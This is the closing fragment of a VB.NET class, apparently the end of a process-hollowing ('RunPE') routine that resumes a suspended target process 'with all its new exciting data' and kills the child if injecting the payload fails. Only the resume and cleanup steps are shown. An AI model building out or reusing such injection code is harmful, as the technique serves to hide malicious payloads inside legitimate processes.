If ResumeThread(PI.hThread) = -1 Then Throw New Exception() 'Resumes the suspended target with all its new exciting data
Catch ex As Exception
' Any failure above (API error or an exception from parsing payload) ends here: the child created by
' this attempt is looked up by process id and killed, and the attempt is reported as failed.
Dim P As Process = Process.GetProcessById(CInt(PI.dwProcessId))
If P IsNot Nothing Then P.Kill()
Return False
End Try
Return True
End Function
#End Region
End Class